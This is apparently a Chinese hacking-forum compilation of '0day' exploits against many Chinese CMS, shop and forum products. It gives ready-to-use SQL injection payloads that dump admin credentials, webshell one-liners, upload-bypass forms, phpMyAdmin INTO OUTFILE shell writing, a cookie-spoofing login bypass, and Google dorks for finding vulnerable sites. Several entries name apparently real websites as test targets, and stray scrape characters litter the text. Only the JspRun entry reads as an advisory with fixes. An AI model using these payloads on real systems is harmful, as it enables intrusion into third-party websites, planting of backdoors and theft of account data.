0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本

" m: J" _1 G7 ~4 \直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Asprain论坛 注册用户 上传图片就可拿到webshell
6 P8 ]. }; u% w1 r8 D) U. r4 N
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 s( @8 C0 o$ D7 i9 D1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
2.gif 为一小图片文件，一定要小，比如qq表情图片
: Z  H% y4 P' n& a. `: y3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
5 a. H# E4 r* q6 S0 z/ O4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5.q.asp;.gif
google：Powered by Asprain
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- U5 m. ?7 _3 f8 `( _/ ^( eShopNum1全部系统存在上传漏洞。

首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
按说明 提示登录后台。。
+ e. e4 D, p; c( @6 F. o在后台功能页面->附件管理->附件列表
) Q8 K. J& s0 x9 n$ D可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 s% Q. T& p3 v, O
牛牛CMS中小企业网站管理系统 上传漏洞
3 K' F" G" |( }. q: Z) @7 I# N
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
后台:admin/login.asp
ewebeditor 5.5 Nday
' |/ G' e( R2 M- e3 Zexp:
& ]* s4 l5 Z4 I/ w) K7 Q0 R3 P9 ^3 F<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
* i& P% u+ m& f" I! }<input?type=file?name=uploadfile?size=100><br><br>?
<input?type=submit?value=upload>?
1 G% T" f8 T3 u4 l& w</form>
ps:先上传小马.
, y1 x2 ]0 m! s7 p9 Einurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
( i* W5 G. {, H) J. a
$ k% O& h' |3 _" S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% i5 K) ^9 K, ^) ]& M$ U/ m
YothCMS 遍历目录漏洞
: R( M8 F, K) K# V/ V
) X% C; Q- G. d, ]: e* H% r6 C优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
; P, k& j: @- Y7 [; n, Z遍历目录:
ewebeditor/manage/upload.asp?id=1&dir=../
data:
( J1 u- L3 M5 u' V3 r6 C4 S4 Whttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ u+ k* |" o: B5 |, q% a8 S9 z& B  H
  z% b7 M! D/ c% G/ E) z: W, ZNet112企业建站系统 1.0

; o. a& V, r; @4 x/ i源码简介：
% v; n/ b9 j3 A+ E6 d7 \2 INet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
3 c; s. L$ E! t" D( f8 E添加管理员：
; |3 {9 ^& O  |( [- bhttp://www.0855.tv/admin/admin.asp?action=add&level=2
其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
2 g6 A. N- G6 E9 Y3 K' G! lhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
http://www.0855.tv/inc/Upfile.asp?Stype=2
# k1 u# i* X& `怎么利用自己研究。
0 G+ y! ]* P5 N  _; A; ]1 V6 r遍历目录：
8 m" D1 {" P3 ]http://www.0855.tv/admin/upfile.asp?path=../..
如：
3 x# n0 `$ Y. o3 S2 s  lhttp://www.0855.tv/admin/upfile.asp?path=../admin
9 D' F5 L* }. Phttp://www.0855.tv/admin/upfile.asp?path=../data
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

8 E, M" F9 P2 Z, U  G易和阳光购物商城通杀 上传漏洞

前提要求是IIS6.0+asp坏境。
+ B. V$ O$ G- v1 q$ h" o4 m漏洞文件Iheeo_upfile.asp
过滤不严.直接可以iis6.0上传
2 Q* `- A3 R/ p6 A把ASP木马改成0855.asp;1.gif
直接放到明小子上传
" ]: \: v/ e7 q: U: }, DGoogle搜索：inurl:product.asp?Iheeoid=
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

! p# G4 v4 L: O6 k9 Sphpmyadmin后台4种拿shell方法

方法一：
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
7 p: s5 d0 ?+ z. t1 HINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
8 T0 |: }' j& P  ~9 Y( wSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
* Z+ q* o" J; r% Q3 F  a* ^, X----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
一句话连接密码：xiaoma
方法二：
; q( K; Z9 g* m) c1 M& @  kCreate TABLE xiaoma (xiaoma1 text NOT NULL);
' q( p% k% M" f) U8 Z/ qInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
, w" r% ]: A6 U  W* jselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
方法三：
* a  Y5 ^; U3 V  L$ Y读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 O1 F+ f8 d( Q! Mcmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' c4 [+ n1 Y8 c' T4 w方法四：
select load_file('E:/xamp/www/xiaoma.php');
, C) h/ @- `- {. w) m: e/ F9 Dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ g4 h$ H9 z% T8 A
传信网络独立开发网站源码0day漏洞

后台system/login.asp
进了后台有个ewebeditor
8 X2 l8 u+ r" g4 ^Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
! F3 o7 c7 i) M. M数据库ubbcode/db/ewebeditor.mdb
3 K7 H. {: S5 o% A4 Z默认账号密码yzm 111111
9 `( k" o' D% W) p5 n* Z
拿webshell方法
登陆后台点击“样式管理”-选择新增样式
样式名称:scriptkiddies 随便写
路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
2 g3 r# F9 H" l4 ]" x' s图片类型比如就是我们要上传的ASP木马格式
上传路径：/
图片限制：写上1000 免的上不了我们的asp木马
" _8 F9 r3 f# N/ ]. j( p上传内容不要写
可以提交了
: D; z9 ]/ @# C  ^" |9 g' }  p. p样式增加成功！
; C0 W: A9 D8 R% R, K- s返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
( M% `& H) w& r4 O+ `$ ^' J" T+ J按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
! r5 M% F1 e" m& x6 V上ASP木马 回车 等到路径

% j* _1 ]) A4 A7 }9 o后台：system/login.asp
/ W- D7 C- r, C* }' N, }Exp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
; e3 [5 ]) z+ L& z2 u. k测试:
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
1 S: Y: [; S0 @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: d. T, h; j. {# k5 X
foosun 0day 最新注入漏洞
5 I  U& j/ ^$ t. m
漏洞文件：www.xxx.com/user/SetNextOptions.asp
# d5 ~! l% ~$ ^/ v! S% {利用简单的方法：
; }% ?4 I2 q! }6 A6 @7 G7 W暴管理员帐号：
: t2 Q- v+ P! _7 g: n5 f: e3 Rhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! y3 e3 s! t4 M  R/ p
" X1 d) a  w$ k  W" ^网站程序的版权未知！
* w  \9 `: n; W; R& i, \
默认网站数据库：
5 m5 Z8 Z& n. Lwww.i0day.com/data/nxnews.mdb
ewebeditor 在线编辑器：
' K" j/ ~9 |6 \3 [' q/ z& s编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
3 l% t$ V1 ]% K默认密码：admin  admin
6 V! Q) g; D/ h( p% X- r# O登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
* I. S/ l  B* r
Sql注入漏洞：
http://www.i0day.com/detail.asp?id=12
exp:
% |1 ?+ x, Y' F2 x+ tunion select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞：
6 ~( M7 J# m$ y* D后台+upfile.asp
如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
" P/ E" y. {* _6 K3 F: Mgoogle:inurl:news.asp?lanmuName=
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" Q0 X- n, |0 K' a& f+ P. D# j6 S: g
dedecms最新0day利用不进后台直接拿WEBSHELL
+ u+ L/ i4 C+ @* p" n9 H* c8 {9 ?" _& A
拿webshell的方法如下：
网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
前题条件，必须准备好自己的dede数据库，然后插入数据：
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
& c- m3 }" @' @7 e3 X0 L* D<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* m5 t/ C/ s/ W2 W7 C<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; E$ K; ?8 d# B7 @2 n<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 [) a7 V3 V* \2 C, r6 c: U7 N<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 ~7 }' |' t! C! |<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
  ?4 X0 w% ?2 T+ i<script>
function addaction()
" h5 o5 v5 h$ s3 s{
) A3 Q6 P3 |9 W$ f9 K8 B4 A" B. @2 mdocument.QuickSearch.action=document.QuickSearch.doaction.value;
}
6 K, j2 @" @) S0 k% @: F, a$ ?</script>
-----------------------------------------------------------------------------------------------------------------------------------------------
& Y. J) f5 m7 S$ ?5 {
dedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
+ {( b0 \, S# k0 ]: whttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
5 i4 j/ R/ n' w! _7 W: v把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------

: {5 L/ C+ B/ k, Z多多淘宝客程序上传漏洞
2 m( k7 z% M/ |5 t# [9 k! Y漏洞页面：
admin\upload_pic.php
& e$ N7 o! N& B& {4 Q( E8 K传送门：
" `/ D/ U+ e# |7 s  khttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
9 M6 ?$ I4 Z2 _, L0 A7 _7 m' uPS:copy张图片马 直接  xxx.php 上传抓包地址！
------------------------------------------------------------------------------------------------------------------------------------------------------

无忧公司系统ASP专业版后台上传漏洞
漏洞文件 后台上传
admin/uploadPic.asp
$ y! C# S4 _! F1 H- w6 d' {漏洞利用 这个漏洞好像是雷池的
: y) c. \1 l$ W" K' Xhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
等到的webshell路径：
- K9 S# D  g/ n9 S( s2 D/UploadFiles/scriptkiddies.asp;_2.gif
$ j$ u6 f+ T: N4 Y---------------------------------------------------------------------------------------------------------------------------------------------------

9 u! @4 z# V( ~住哪酒店分销联盟系统2010
2 |% h" g- v/ I  H4 G3 p3 ?Search：
inurl:index.php?m=hotelinfo
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台：index.php?m=admin/login
; Q1 D+ C: {3 n, R--------------------------------------------------------------------------------------------------------------------------------------------------

- I, F1 d' D. S3 ~8 J" A6 P+ ^, Qinurl:info_Print.asp?ArticleID=
后台 ad_login.asp
爆管理员密码：
* w* N$ j# m5 A; B. lunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------

搜索框漏洞！
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
0 H, n  g& J0 [6 n" z1 z/ ~" P# Y--------------------------------------------------------------------------------------------------------------------------------------------------------
2 b" }0 d6 w- l( a! Y9 m
关键字：
- Z/ k& n" Z& F- ?1 D' c$ Minurl:/reg_TemletSel.asp?step=2
或者
8 z3 o; i- P! }) I' C7 U4 e电子商务自助建站--您理想的助手
5 g* }# i$ q) o: K0 }) [+ d- Z7 C& [; K-------------------------------------------------------------------------------------------------------------------------------------------------
6 f; G  S4 r" V( U
7 y& l+ x6 d* M* z7 g7 q2 ^iGiveTest 2.1.0注入漏洞
Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
; `# G: I9 }% B& p: W% x' H谷歌关键字: “Powered by iGiveTest”
" Y; K! M2 k7 s* d; @随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------

" K+ \2 O3 W) p. G; D& bCKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
后台:admin/login.asp
/ G' q+ f" D0 p5 X9 `% r. w登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
- S& V3 O8 f: i  `, d--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 A0 g; S+ t) ^
段富超个人网站系统留言本写马漏洞
源码下载：http://www.mycodes.net/24/2149.htm
7 ~. N' {" e5 taddgbook.asp 提交一句话。
9 l" ]% e: ]# d2 u2 k, o8 h连接： http://www.xxxx.tv/date/date3f.asp
2 U) T9 b( V# x( hgoogle:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 y6 P9 a0 Z9 Y+ p7 [
: T+ L8 h# `" L7 a& A智有道专业旅游系统v1.0 注入及列目录漏洞
默认后台路径：/admin/login.asp
. [+ @. Y0 G6 Y/ |7 ^默认管理员：admin
& u* X0 V, c3 {默认密码：123456
SQL EXP Tset:
( k5 n/ q* O+ n5 k* {! m) k# G# Khttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

( A( o; l0 W$ [. z- K$ Zewebeditor(PHP) Ver 3.8 本任意文件上传0day
' b/ A" e6 i: tEXP：
<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
- z, Q! j$ `- x& H( Y: [  Lart/form-data">
4 t- _: Z* N! p& S2 z0 X7 z<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
5 G3 b; H1 C8 }5 Rfile:<input type=file name="uploadfile"><br>
' u9 i$ _9 x0 A- i<input type=button value=submit onclick=fsubmit()>
</form><br>
+ K8 {$ p( g2 F+ d; V3 t<script>
; r: l, I( ~# ^8 i. n. Afunction fsubmit(){
form = document.forms[0];
" D% X4 I+ m1 k# _1 V6 Q$ M& h- \, Aform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
2 y, n- w5 |2 j; @* Ralert(form.action);
, h8 S- k# W" b# Rform.submit();
}
</script>
( v( t7 z  r6 @7 N2 x% ]* f$ y' ?& N注意修改里面ewebeditor的名称还有路径。
- H. e8 Q* _4 D1 I0 n7 E+ @( Z; j---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

提交’时提示ip被记录 防注入系统的利用
" k0 o1 L) F+ X% j网址：http://www.xxx.com/newslist.asp?id=122′
% U" m6 B, ?8 }' P2 [提示“你的操作已被记录!”等信息。
* h* K& D9 K; _/ o, w8 C利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
1 O( I0 @* o" D+ f-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

西部商务网站管理系统 批量拿shell-0day
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
7 O: C$ m) m1 u' s  ]1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
; G/ e* q# O) Q' @5 p, ]# _4 G3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

& _7 X' e# v$ T5 J0 d6 [JspRun!6.0 论坛管理后台注入漏洞
( J+ U. Z. Y3 T
: X: I1 m8 f' T5 |* e# pSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
0 N: p7 J7 C& d1 E5 y: ~JspRun!6.0
漏洞描述:
JspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
2 Z( i# a6 V* C1 G! a% gString export = request.getParameter("export");//直接获取，没有安全过滤
; I) U+ s  t+ F/ L+ c( nif(export!=null){
  l* I+ S- ^5 F8 qList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
<*参考
3 g1 o" r, M0 w% Inuanfan@gmail.com
2 @/ m- |  \( _/ K! b; _*> SEBUG安全建议:
6 s, r$ J# o7 _1 f2 {www.jsprun.net
. q6 O; F3 D" Y! M# @; {（1）安全过滤变量export
# g% z" b  e& \# A( F( @  m/ _# \, S（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

0 P$ }" U# w2 k6 Z3 ?+ i$ k2 R乌邦图企业网站系统 cookies 注入

: m& c. q) t' ]$ y5 ^) K# p程序完整登陆后台:/admin/login.asp
; Z9 {. j: x3 o& G0 Y9 o& l# S/ I) i默认登陆帐号:admin 密码:admin888
$ u6 D+ y4 P2 k6 d% a! ^' h. \; X语句：(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段：
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
& E. g  y  n: B" Q7 o- s爆不出来自己猜字段。
1 H  L, B- R4 n: b; \" r$ r注入点：http://www.untnt.com/shownews.asp?=88
getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
  W/ s2 W1 [$ x5 O- P2 @9 A4 ]关键字：
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# a2 b& \, o" Q7 G
CKXP网上书店注入漏洞
5 c0 U9 Q3 k3 {
. O6 f0 l6 x( h5 W' D工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
2 d/ _0 L& a* S( b( J& [$ R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" Z" A8 o1 ^3 j0 V. G5 ~
( M: t1 ^% O" W5 x9 I- [/ R0 v( TYxShop易想购物商城4.7.1版本任意文件上传漏洞
: ^( H# h' i$ `% f
, O% d. p4 X  ^% a3 h0 thttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
跳转到网站根目录上传任意文件。
! r; u0 h4 Y$ u; z! k如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
6 q5 Z# S/ Y$ Z3 e7 o, y) _<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
* V5 R, t: R- H. q<input type="file" name="NewFile" size="50"><br>
, Q3 `! u8 [5 t2 j6 s  j9 s& }( S2 n, I<input id="btnUpload" type="submit" value="Upload">
" b( f6 W5 o5 v& H& t; d& ]5 E  r</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' \2 n  U2 S+ R- N8 r
SDcms 后台拿webshell

第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
  W$ c# z( v( f; c# W8 A3 N) l把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
第二种方法：
; Z+ X9 F4 c6 p4 v进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
. L, c% Y+ ]. D, [, [  e' U, _( x3 s第三种方法：
, g' b1 ~6 p, e) z进入后台-->界面管理-->模板文件管理-->创建文件
6 f) R1 `  C. J  l) @文件名写入getshell.ashx
内容写入下面内容：
: \! f) Y( Z' `5 L- u, A' ^8 T/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
0 {) k! {, Y, S/ P. L( [using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
% k9 \: d1 x: B% i/ ?5 scontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
3 T: J- [4 K+ \: ^0 G' X/ Efile1.Close();
}
public bool IsReusable {
get {
return false;
( C# p  ?- G2 M+ J* w( e9 S}
}
}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ^5 G7 V+ B6 T. e. g& h
1 Z( i  W4 X+ M  LESCMS网站管理系统0day
0 \! U5 n# ]4 ]8 V6 `
8 i! W: q2 Z1 w1 e3 g. U) D后台登陆验证是通过admin/check.asp实现的

首先我们打开http://target.com/admin/es_index.html
* v/ D* H; N# B  B7 h# ?然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;
修改,然后刷新
进后台了嘎..
/ p( y3 G  Y3 ^; w  b& l然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
# p! ?5 ^+ d1 j, W8 `
9 R* M* H: R4 P利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
/ D1 l$ \. U$ @1 X) C2 I* a. K/ a嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ T. m: c; L5 o' v, b1 B8 S: ~" l
& B' `; I7 l0 i- v" s宁志网站管理系统后台无验证漏洞及修复

网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
+ W/ V8 V4 p' u1 k5 {: Z3 c2 P& l学校网站管理系统 V.2011版本
http://down.chinaz.com/soft/29943.htm
8 K, |* `/ N# z; t! f( n其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
login.asp代码如下:
<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
3 c0 `5 X6 [, W7 V* i! lmanage.asp代码我就不帖出来了.反正也没验证.
$ k3 Y4 H5 `, w只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
$ Q* ?! W2 N2 V( Q. j. R/ L漏洞利用:
: M/ ]& |" _1 ?+ h% k7 ~直接访问http://www.0855.tv/admin/manage.asp
& j7 H" h; \0 }数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 j/ H; o  z% Y
% f) |  l" x+ G6 Jphpmyadmin拿shell的四种方法总结及修复
  _' k) A9 i1 l4 @1 |! H( x# F5 t
/ ?% b# X/ e! M5 p. V& j方法一：
( f+ N% a- {* |& |1 @: JCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! x6 N# Y, y1 K5 |----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
, \9 x5 G+ h( Y3 ?1 R    一句话连接密码：7on
# a5 p# V' H) x5 C+ J1 ^. W) m方法二：
# b, S6 k2 v# w5 M读取文件内容：    select load_file('E:/xamp/www/s.php');
8 ?# _- {6 w! {9 w6 r' r写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三：
4 I  [8 `) I- m; c7 X5 xJhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
/ Q. V0 h9 I% y  {% N9 O, b/ B! vselect cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
& q2 R' A% d/ |8 f( T8 |$ L: M<?php eval($_POST[cmd])?>
4 I, \& u3 ]4 q$ h6 X$ xCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
8 `1 P) _/ Y5 d* D" [! ?7 N/ e( {方法四：
8 l  Z# K% ~# \  o  Wselect load_file('E:/xamp/www/study.php');
6 B- E2 H( R2 E$ r* k  Wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
